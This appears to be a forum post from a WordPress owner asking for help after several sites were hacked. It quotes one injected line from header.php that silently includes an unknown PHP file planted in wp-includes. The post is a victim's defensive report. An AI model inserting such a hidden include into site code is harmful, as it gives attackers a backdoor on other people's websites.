I'm experiencing a hacking problem with most of my WordPress installations. There are two things that are happening. First a new php file is uploaded to the wp-includes folder. What this file does, I do not know. I don't understand PHP well enough. I would be happy to share it if if would help.
The second thing is a piece of code that is inserted after the opening body tag in the header.php file. Here is a sample of this code:
<?php /* start_extra_placement_ */ @include_once("/home/content/54/9357554/html/wp-includes/Oyk5.php"); /* end_extra_placement_ */ ?>
This problem is across multiple hosting accounts, although they are all hosted at GoDaddy. If anyone has any insights as to how these hackers are getting in and how I can prevent them from coming back, I would love to know. Thank you.